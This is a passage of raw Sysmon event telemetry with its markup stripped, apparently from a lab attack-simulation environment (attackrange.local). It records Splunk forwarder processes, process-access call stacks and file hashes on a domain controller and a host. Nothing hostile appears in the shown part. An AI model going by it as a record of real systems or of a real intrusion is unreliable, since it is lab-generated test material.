Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6599853AB3DCD139D8DDC9DB5C226552,SHA256=3DF6F566BCCBD2F4433557C6A1A90F0DBDD91B27CD9095C77A59A0F3126EDD0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1851649C9A6128CB390A490DFCAB1BAD,SHA256=A57893F92148310A34938D3CA977974609D40A81F7E87A6A9D283673A79F7616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF4E9B33057C46A7F58409FF1999D459,SHA256=2186DCB53B55ADF3F589CE0D8DF8815308CF8388EEBDFE57B9F57AF23ECA00AA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:51.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3095A154DB7C2E08146085F9899DCC8E,SHA256=60D83DA727F8E10BDEB9480D494FFE524B96F603D66B9EA4D92FC1A91C59F29B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.820{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C55387C013F9BEEAACBA9654A586A6,SHA256=1D4B3104DAFA7144D3DA4984BA77ABD68E5B379B503E7433334A7D6DB8C96CC8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9AD15A282760AB833BA885BAF5F3E8E,SHA256=308427D7442F0BDAED67DED11A7AD855991046642252B35500FAAF125C413799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:52.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1E34B7042E9B9A34FE2E68A5B2E3EE1,SHA256=619C3CF1BCADC02F8CDEA57C3BDD26134AF07E1C951D3313CBB831B2FAF5AD8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.373{466BC892-F498-60EB-2B7D-00000000CF01}9808388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:52.157{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.152{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.834{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BE68A6B6E9BC4DA259CB206D0E1193F,SHA256=82B03D6ED3F6B04ED41D6663C3136C7770BB2B6C72CCFF737A00CDB64271DB5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:53.703{466BC892-F499-60EB-2D7D-00000000CF01}102244332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.518{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
